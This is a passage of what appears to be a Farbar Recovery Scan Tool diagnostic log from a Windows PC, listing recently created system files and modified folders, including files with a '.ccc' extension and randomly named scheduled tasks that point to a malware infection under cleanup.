2015-10-13 16:10 - 2015-09-15 11:35 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2015-10-13 16:09 - 2015-10-01 12:06 - 00692672 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2015-10-13 16:09 - 2015-10-01 12:04 - 00616360 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2015-10-13 16:09 - 2015-10-01 12:00 - 00147456 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2015-10-13 16:09 - 2015-10-01 12:00 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2015-10-13 16:09 - 2015-10-01 12:00 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2015-10-13 16:09 - 2015-10-01 12:00 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2015-10-13 16:09 - 2015-10-01 12:00 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2015-10-13 16:09 - 2015-10-01 11:50 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2015-10-13 16:09 - 2015-10-01 11:00 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2015-10-13 16:07 - 2015-07-18 07:08 - 00984448 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00901264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ucrtbase.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00066400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00063840 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00022368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00020832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00019808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00019808 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00017760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00017760 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00016224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00016224 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00015712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00015712 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00014176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00014176 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00013664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00013664 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-1.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00012128 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-1.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-eventing-provider-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l2-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-timezone-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l2-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-2-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-eventing-provider-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l2-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-timezone-l1-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l2-1-0.dll
2015-10-13 16:07 - 2015-07-18 07:08 - 00011616 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-2-0.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-11-10 11:19 - 2009-07-13 23:13 - 00782510 _____ C:\Windows\system32\PerfStringBackup.INI
2015-11-10 11:16 - 2011-12-25 10:34 - 01834783 _____ C:\Windows\WindowsUpdate.log
2015-11-10 11:14 - 2015-06-30 04:19 - 00000000 ____D C:\GOG Games
2015-11-10 11:14 - 2014-12-22 20:27 - 00000000 ____D C:\AdwCleaner
2015-11-10 11:14 - 2014-12-20 03:02 - 00000000 ____D C:\NVIDIA
2015-11-10 11:14 - 2011-12-15 16:30 - 00000000 ____D C:\MININT
2015-11-10 11:14 - 2011-04-06 14:39 - 00000000 ____D C:\Intel
2015-11-10 11:12 - 2014-11-12 15:38 - 00113220 _____ C:\Windows\setupact.log
2015-11-10 11:12 - 2014-10-26 21:30 - 00001328 _____ C:\Windows\Tasks\IJFXTJV.job
2015-11-10 11:12 - 2014-10-26 21:29 - 00001324 _____ C:\Windows\Tasks\DZZPF.job
2015-11-10 11:12 - 2014-10-26 21:27 - 00001328 _____ C:\Windows\Tasks\SXQHCMK.job
2015-11-10 11:12 - 2014-10-26 21:26 - 00001326 _____ C:\Windows\Tasks\FECWQT.job
2015-11-10 11:12 - 2012-09-11 01:48 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-11-10 11:12 - 2009-07-13 23:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-11-10 11:11 - 2011-12-15 15:08 - 00000000 ____D C:\ProgramData\NVIDIA
2015-11-09 20:43 - 2015-07-01 02:29 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-11-09 20:39 - 2011-12-25 12:36 - 00000000 ____D C:\Users\KW
2015-11-09 20:28 - 2009-07-13 22:45 - 00028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-11-09 20:28 - 2009-07-13 22:45 - 00028944 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-11-09 20:23 - 2014-12-12 20:18 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2015-11-09 20:23 - 2011-12-27 21:26 - 00000000 ____D C:\Users\KW\Downloads\Applications
2015-11-09 20:19 - 2015-09-26 20:19 - 00000000 ____D C:\Users\KW\Documents\SysnativeFileCollectionApp
2015-11-09 20:19 - 2015-08-09 14:52 - 00000000 ____D C:\Users\KW\Documents\The Witcher 3
2015-11-09 20:19 - 2015-02-28 01:36 - 00000000 ____D C:\Users\KW\Documents\Tunngle
2015-11-09 20:19 - 2015-01-01 21:58 - 00000000 ____D C:\Users\KW\Documents\Wondershare Video Editor
2015-11-09 20:19 - 2014-11-06 04:52 - 00000000 ____D C:\Users\KW\Documents\WB Games
2015-11-09 20:19 - 2013-04-28 00:01 - 00000000 ____D C:\Users\KW\Documents\Telltale Games
2015-11-09 20:19 - 2013-03-05 14:04 - 00000000 ____D C:\Users\KW\Documents\Tax Invoices
2015-11-09 20:18 - 2015-08-03 13:43 - 00000000 ____D C:\Users\KW\Documents\CPY_SAVES
2015-11-09 20:18 - 2015-07-01 02:29 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-11-09 20:18 - 2015-04-29 22:53 - 00000000 ____D C:\Users\KW\Documents\Dolphin Emulator
2015-11-09 20:18 - 2015-04-03 17:50 - 00000000 ____D C:\Users\KW\Documents\KoeiTecmo
2015-11-09 20:18 - 2015-01-13 03:58 - 00000000 ____D C:\Users\KW\Documents\Square Enix
2015-11-09 20:18 - 2014-12-28 02:48 - 00000000 ____D C:\Users\KW\Documents\Respawn
2015-11-09 20:18 - 2014-12-16 00:35 - 00000000 ____D C:\Users\KW\Documents\My Cheat Tables
2015-11-09 20:18 - 2014-04-06 23:27 - 00000000 ____D C:\Users\KW\Documents\Ghost Games
2015-11-09 20:18 - 2012-10-17 03:04 - 00000000 ____D C:\Users\KW\Documents\SPSSInc
2015-11-09 20:18 - 2012-09-16 23:05 - 00000000 ____D C:\Users\KW\Documents\PCSX2
2015-11-09 20:18 - 2012-08-30 19:47 - 00000000 ____D C:\Users\KW\Documents\My Games
2015-11-09 20:18 - 2012-02-23 19:41 - 00000000 ____D C:\Users\KW\Documents\College
2015-11-09 20:16 - 2015-09-12 23:00 - 00000000 ____D C:\Users\KW\Documents\ALI213
2015-11-09 20:16 - 2015-08-26 20:27 - 00002798 _____ C:\Users\KW\Desktop\Rkill.txt.ccc
2015-11-09 20:16 - 2015-04-20 00:48 - 00000000 ____D C:\Users\KW\AppData\Roaming\MK10
2015-11-09 20:16 - 2015-04-12 20:46 - 00000000 ____D C:\Users\KW\Documents\BFH
2015-11-09 20:16 - 2015-03-11 20:37 - 00000000 ____D C:\Users\KW\AppData\Roaming\SmartSteamEmu
2015-11-09 20:16 - 2015-02-28 01:36 - 00000000 ____D C:\Users\KW\AppData\Roaming\Tunngle
2015-11-09 20:16 - 2014-12-27 22:51 - 00000000 ____D C:\Users\KW\AppData\Roaming\Origin
2015-11-09 20:16 - 2014-12-14 21:46 - 00000000 ____D C:\Users\KW\AppData\Roaming\Oracle
2015-11-09 20:16 - 2014-12-12 20:15 - 00001486 _____ C:\Users\KW\Desktop\malwarebytes log.txt.ccc
2015-11-09 20:16 - 2014-12-04 21:09 - 00000000 ____D C:\Users\KW\Documents\Assassin's Creed Unity
2015-11-09 20:16 - 2014-10-14 00:12 - 00000000 ____D C:\Users\KW\AppData\Roaming\Steam
2015-11-09 20:16 - 2014-09-26 14:52 - 00000000 ____D C:\Users\KW\AppData\Roaming\Mozilla
2015-11-09 20:16 - 2014-08-31 11:55 - 00000000 ____D C:\Users\KW\AppData\Roaming\Xilisoft
2015-11-09 20:16 - 2014-07-10 20:08 - 00000766 _____ C:\Users\KW\Desktop\employment information (responsibilities).txt.ccc
2015-11-09 20:16 - 2014-03-24 02:11 - 00000000 ____D C:\Users\KW\Documents\Assassin's Creed IV Black Flag
2015-11-09 20:16 - 2013-07-01 16:16 - 00000000 ____D C:\Users\KW\Documents\4A Games
2015-11-09 20:16 - 2013-06-04 14:54 - 00000478 _____ C:\Users\KW\Desktop\Resume.txt.ccc
2015-11-09 20:16 - 2013-05-19 00:12 - 00000000 ____D C:\Users\KW\Documents\BioWare
2015-11-09 20:16 - 2013-05-17 19:17 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2015-11-09 20:16 - 2013-05-10 23:17 - 00000000 ____D C:\Users\KW\Documents\Activision
2015-11-09 20:16 - 2013-05-05 18:50 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ArmA 2
2015-11-09 20:16 - 2013-05-05 18:42 - 00000000 ____D C:\Users\KW\AppData\Roaming\Play withSIX
2015-11-09 20:16 - 2013-04-30 23:26 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2015-11-09 20:16 - 2013-04-30 18:27 - 00021918 _____ C:\Users\KW\Desktop\Research Proposal FINAL.docx.ccc
2015-11-09 20:16 - 2013-04-12 21:48 - 00000000 ____D C:\Users\KW\AppData\Roaming\New Technology Studio
2015-11-09 20:16 - 2013-04-12 21:48 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OpenIV
2015-11-09 20:16 - 2013-04-11 17:36 - 00000000 ____D C:\Users\KW\AppData\Roaming\uTorrent
2015-11-09 20:16 - 2012-12-05 13:49 - 00000000 ____D C:\Users\KW\Desktop\New folder
2015-11-09 20:16 - 2012-10-17 03:03 - 00000000 ____D C:\Users\KW\AppData\Roaming\SPSSInc
2015-11-09 20:16 - 2012-09-16 20:43 - 00000000 ____D C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\project64 1.6
2015-11-09 20:16 - 2012-04-27 17:19 - 00000000 ____D C:\Users\KW\AppData\Roaming\Trillium Lane
2015-11-09 20:16 - 2012-03-24 18:49 - 00000000 ____D C:\Users\KW\AppData\Roaming\PowerUp Software
2015-11-09 20:16 - 2012-02-26 17:06 - 00000000 ____D C:\Users\KW\AppData\Roaming\PACE Anti-Piracy
2015-11-09 20:16 - 2011-12-29 21:58 - 00000000 __RHD C:\Users\KW\AppData\Roaming\SecuROM
2015-11-09 20:16 - 2011-12-28 16:19 - 00000000 ____D C:\Users\KW\AppData\Roaming\NVIDIA
2015-11-09 20:16 - 2011-12-26 18:55 - 00000000 ____D C:\Users\KW\AppData\Roaming\WinRAR
2015-11-09 20:16 - 2011-12-25 12:36 - 00000000 ___RD C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-11-09 20:16 - 2011-12-25 12:36 - 00000000 ___RD C:\Users\KW\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-11-09 20:13 - 2015-06-30 04:15 - 00000000 ____D C:\Users\KW\AppData\Roaming\DAEMON Tools Lite
2015-11-09 20:13 - 2015-06-24 19:30 - 00000000 ____D C:\Users\KW\AppData\Roaming\avidemux
2015-11-09 20:13 - 2015-03-01 03:30 - 00000000 ____D C:\Users\KW\AppData\Roaming\Garena
2015-11-09 20:13 - 2015-03-01 03:28 - 00000000 ____D C:\Users\KW\AppData\Roaming\GarenaPlus
2015-11-09 20:13 - 2015-02-16 00:45 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Shiver Games
2015-11-09 20:13 - 2014-12-15 00:54 - 00000000 ____D C:\Users\KW\AppData\LocalLow\SKS
2015-11-09 20:13 - 2014-12-14 21:48 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Oracle
2015-11-09 20:13 - 2014-12-09 00:48 - 00000000 ____D C:\Users\KW\AppData\Roaming\Fatshark
2015-11-09 20:13 - 2014-09-26 15:07 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Yahoo!
2015-11-09 20:13 - 2014-09-26 14:37 - 00000000 ____D C:\Users\KW\AppData\Roaming\Electronic Arts
2015-11-09 20:13 - 2014-09-26 14:33 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Unity
2015-11-09 20:13 - 2012-11-26 02:57 - 00000000 ____D C:\Users\KW\AppData\Roaming\Apple Computer
2015-11-09 20:13 - 2012-10-17 01:34 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Sun
2015-11-09 20:13 - 2012-09-19 20:55 - 00000000 ____D C:\Users\KW\AppData\Roaming\e-academy Inc
2015-11-09 20:13 - 2012-04-27 17:19 - 00000000 ____D C:\Users\KW\AppData\Roaming\Leadertech
2015-11-09 20:13 - 2012-04-27 17:09 - 00000000 ____D C:\Users\KW\AppData\Roaming\Digidesign
2015-11-09 20:13 - 2012-04-25 18:08 - 00000000 ____D C:\Users\KW\AppData\Roaming\Google
2015-11-09 20:13 - 2012-03-09 00:53 - 00000000 ____D C:\Users\KW\AppData\Roaming\Media Player Classic
2015-11-09 20:13 - 2012-02-20 17:02 - 00000000 ____D C:\Users\KW\AppData\Roaming\DarknessIIDemo
2015-11-09 20:13 - 2012-02-16 19:49 - 00000000 ____D C:\Users\KW\AppData\Roaming\InstallShield
2015-11-09 20:13 - 2012-02-03 22:00 - 00000000 ____D C:\Users\KW\AppData\Roaming\Assassin's Creed Revelations
2015-11-09 20:13 - 2011-12-27 21:27 - 00000000 ____D C:\Users\KW\AppData\Roaming\Malwarebytes
2015-11-09 20:13 - 2011-12-26 00:07 - 00000000 ____D C:\Users\KW\AppData\Roaming\Macromedia
2015-11-09 20:13 - 2011-12-26 00:07 - 00000000 ____D C:\Users\KW\AppData\Roaming\Adobe
2015-11-09 20:12 - 2015-05-12 01:36 - 00000000 ____D C:\Users\KW\AppData\Local\Rockstar Games
2015-11-09 20:12 - 2015-03-11 20:38 - 00000000 ____D C:\Users\KW\AppData\Local\Personal_use_only_(Darean
2015-11-09 20:12 - 2015-03-01 00:58 - 00000000 ____D C:\Users\KW\AppData\Local\Steam
2015-11-09 20:12 - 2015-01-21 03:44 - 00000000 ____D C:\Users\KW\AppData\Local\Sniper3
2015-11-09 20:12 - 2015-01-01 21:58 - 00000000 ____D C:\Users\KW\AppData\Local\Wondershare
2015-11-09 20:12 - 2014-12-27 22:50 - 00000000 ____D C:\Users\KW\AppData\Local\Origin
2015-11-09 20:12 - 2014-12-16 23:36 - 00000000 ____D C:\Users\KW\AppData\Local\Secunia PSI
2015-11-09 20:12 - 2014-11-12 21:21 - 00000000 __SHD C:\Users\KW\AppData\LocalLow\EmieBrowserModeList
2015-11-09 20:12 - 2014-11-12 03:18 - 00000000 ____D C:\Users\KW\AppData\Local\PAYDAY 2
2015-11-09 20:12 - 2014-09-26 14:33 - 00000000 ____D C:\Users\KW\AppData\Local\Unity
2015-11-09 20:12 - 2014-04-09 16:20 - 00000000 __SHD C:\Users\KW\AppData\LocalLow\EmieUserList
2015-11-09 20:12 - 2014-04-09 12:24 - 00000000 __SHD C:\Users\KW\AppData\LocalLow\EmieSiteList
2015-11-09 20:12 - 2014-04-06 23:32 - 00000000 ____D C:\Users\KW\AppData\Local\NVIDIA Corporation
2015-11-09 20:12 - 2014-04-06 23:31 - 00000000 ____D C:\Users\KW\AppData\Local\NVIDIA
2015-11-09 20:12 - 2013-05-10 23:17 - 00000000 ____D C:\Users\KW\AppData\Local\SKIDROW
2015-11-09 20:12 - 2013-05-05 18:42 - 00000000 ____D C:\Users\KW\AppData\Local\Play withSIX
2015-11-09 20:12 - 2013-04-30 23:28 - 00000000 ____D C:\Users\KW\AppData\Local\PunkBuster
2015-11-09 20:12 - 2012-02-26 17:06 - 00000000 ____D C:\Users\KW\AppData\Local\PACE Anti-Piracy
2015-11-09 20:12 - 2012-02-23 20:13 - 00000000 ____D C:\Users\KW\AppData\LocalLow\Adobe
2015-11-09 20:12 - 2012-02-03 22:00 - 00000000 ____D C:\Users\KW\AppData\Local\Ubisoft Game Launcher
2015-11-09 20:12 - 2011-12-26 01:43 - 00000000 ____D C:\Users\KW\AppData\Local\Skyrim
2015-11-09 20:12 - 2011-12-25 12:36 - 00000000 ____D C:\Users\KW\AppData\Local\VirtualStore
2015-11-09 20:11 - 2014-09-26 14:52 - 00000000 ____D C:\Users\KW\AppData\Local\Mozilla
2015-11-09 20:11 - 2013-04-12 21:48 - 00000000 ____D C:\Users\KW\AppData\Local\New Technology Studio
2015-11-09 20:11 - 2012-09-20 00:15 - 00000000 ____D C:\Users\KW\AppData\Local\Microsoft Help
2015-11-09 20:04 - 2014-12-05 02:10 - 00000000 ____D C:\Users\KW\AppData\Local\CrashDumps
2015-11-09 20:04 - 2012-09-11 01:48 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-11-09 18:38 - 2015-06-03 18:41 - 00000000 ____D C:\Users\KW\AppData\Local\GWX
2015-11-09 18:38 - 2014-12-15 23:40 - 00000000 ____D C:\Users\KW\AppData\Local\ICSharpCode.net
2015-11-09 18:38 - 2014-09-26 14:56 - 00000000 ____D C:\Users\KW\AppData\Local\Macromedia
2015-11-09 18:38 - 2013-05-05 18:42 - 00000000 ____D C:\Users\KW\AppData\Local\IsolatedStorage
2015-11-09 18:38 - 2012-10-17 03:03 - 00000000 ____D C:\Users\KW\AppData\Local\javasharedresources
2015-11-09 18:38 - 2012-10-17 03:03 - 00000000 ____D C:\Users\KW\AppData\Local\IBM
2015-11-09 18:38 - 2012-04-25 18:07 - 00000000 ____D C:\Users\KW\AppData\Local\Google
2015-11-09 18:38 - 2011-06-23 18:16 - 00000000 ___HD C:\Users\KW\AppData\Local\M72LASVTGjeVLt
2015-11-09 18:37 - 2015-09-05 02:16 - 00000000 ____D C:\Users\KW\AppData\Local\CEF
2015-11-09 18:37 - 2015-08-23 21:10 - 00000000 ____D C:\Users\KW\AppData\Local\EMU
2015-11-09 18:37 - 2015-08-18 23:20 - 00000000 ____D C:\ProgramData\{D612DEA7-41A3-483A-9F90-A49A62502B1B}
2015-11-09 18:37 - 2015-06-30 04:58 - 00000000 ____D C:\ProgramData\GOG.com
2015-11-09 18:37 - 2015-06-30 04:19 - 00000000 ____D C:\Users\KW\AppData\Local\Disc_Soft_Ltd
2015-11-09 18:37 - 2015-03-05 20:11 - 00000000 ____D C:\Users\KW\AppData\Local\BANDAI NAMCO Games
2015-11-09 18:37 - 2015-03-01 03:27 - 00000000 ____D C:\ProgramData\GarenaMessenger
2015-11-09 18:37 - 2015-01-01 21:59 - 00000000 ____D C:\ProgramData\Wondershare
2015-11-09 18:37 - 2014-12-27 22:49 - 00000000 ____D C:\ProgramData\Origin
2015-11-09 18:37 - 2014-12-14 21:44 - 00000000 ____D C:\ProgramData\Oracle
2015-11-09 18:37 - 2014-12-13 00:31 - 00000000 ____D C:\ProgramData\Sophos
2015-11-09 18:37 - 2014-12-09 02:50 - 00000000 ____D C:\Users\KW\AppData\Local\Chromium
2015-11-09 18:37 - 2014-12-05 01:00 - 00000000 ____D C:\ProgramData\RogueKiller
2015-11-09 18:37 - 2014-12-05 00:17 - 00000000 ____D C:\ProgramData\HitmanPro
2015-11-09 18:37 - 2014-11-12 15:39 - 00000000 __SHD C:\Users\KW\AppData\Local\EmieBrowserModeList
2015-11-09 18:37 - 2014-11-12 03:15 - 00000000 ____D C:\ProgramData\PAYDAY 2
2015-11-09 18:37 - 2014-09-26 15:07 - 00000000 ____D C:\ProgramData\Yahoo!
2015-11-09 18:37 - 2014-09-26 14:52 - 00000000 ____D C:\ProgramData\Mozilla
2015-11-09 18:37 - 2014-08-31 11:54 - 00000000 ____D C:\ProgramData\Xilisoft
2015-11-09 18:37 - 2014-04-09 12:26 - 00000000 __SHD C:\Users\KW\AppData\Local\EmieUserList
2015-11-09 18:37 - 2014-04-09 12:26 - 00000000 __SHD C:\Users\KW\AppData\Local\EmieSiteList
2015-11-09 18:37 - 2014-03-24 02:11 - 00000000 ____D C:\ProgramData\Steam
2015-11-09 18:37 - 2013-10-14 16:17 - 00000000 ____D C:\Users\KW\AppData\Local\avgchrome
2015-11-09 18:37 - 2013-07-01 16:13 - 00000000 ____D C:\Users\KW\AppData\Local\4A Games
2015-11-09 18:37 - 2013-05-21 23:12 - 00000000 ____D C:\Users\KW\AppData\Local\FLT
2015-11-09 18:37 - 2013-05-20 16:33 - 00000000 ____D C:\ProgramData\RELOADED
2015-11-09 18:37 - 2013-05-19 00:14 - 00000000 ____D C:\Users\KW\AppData\Local\EA Games
2015-11-09 18:37 - 2013-05-05 20:36 - 00000000 ____D C:\Users\KW\AppData\Local\ArmA 2
2015-11-09 18:37 - 2013-05-05 18:38 - 00000000 ____D C:\Users\KW\AppData\Local\Downloaded Installations
2015-11-09 18:37 - 2013-04-30 23:28 - 00000000 ____D C:\ProgramData\Orbit
2015-11-09 18:37 - 2013-04-28 00:01 - 00000000 ____D C:\ProgramData\REVOLT
2015-11-09 18:37 - 2012-11-26 02:57 - 00000000 ____D C:\Users\KW\AppData\Local\Apple Computer
2015-11-09 18:37 - 2012-11-26 02:56 - 00000000 ____D C:\Users\KW\AppData\Local\Apple
2015-11-09 18:37 - 2012-10-17 03:03 - 00000000 ____D C:\Users\KW\.spss
2015-11-09 18:37 - 2012-10-17 02:52 - 00000000 ____D C:\ProgramData\SafeNet Sentinel
2015-11-09 18:37 - 2012-10-17 01:37 - 00000000 ____D C:\ProgramData\Sun
2015-11-09 18:37 - 2012-10-17 01:36 - 00000000 ____D C:\ProgramData\McAfee
2015-11-09 18:37 - 2012-08-28 21:06 - 00000000 ____D C:\ProgramData\Ubisoft
2015-11-09 18:37 - 2012-04-25 18:07 - 00000000 ____D C:\ProgramData\Google
2015-11-09 18:37 - 2012-04-25 18:06 - 00000000 ____D C:\Users\KW\AppData\Local\Deployment
2015-11-09 18:37 - 2012-04-25 18:06 - 00000000 ____D C:\Users\KW\AppData\Local\Apps\2.0
2015-11-09 18:37 - 2012-03-24 18:37 - 00000000 ____D C:\ProgramData\PowerUp Software
2015-11-09 18:37 - 2012-03-08 10:44 - 00000000 ____D C:\Users\KW\AppData\Local\dxhr
2015-11-09 18:37 - 2012-03-08 10:43 - 00000000 ____D C:\Users\KW\AppData\Local\28050
2015-11-09 18:37 - 2012-03-07 18:32 - 00000000 ____D C:\Users\KW\AppData\Local\FalloutNV
2015-11-09 18:37 - 2012-02-26 17:44 - 00000000 ____D C:\ProgramData\InstallShield
2015-11-09 18:37 - 2012-02-25 01:25 - 00000000 ____D C:\Users\KW\AppData\Local\Ares
2015-11-09 18:37 - 2012-02-16 19:28 - 00000000 ____D C:\Users\KW\AppData\Local\Adobe
2015-11-09 18:37 - 2012-01-26 15:15 - 00000000 ____D C:\Users\KW\AppData\Local\FOMM
2015-11-09 18:37 - 2012-01-25 21:14 - 00000000 ____D C:\Users\KW\AppData\Local\Fallout3
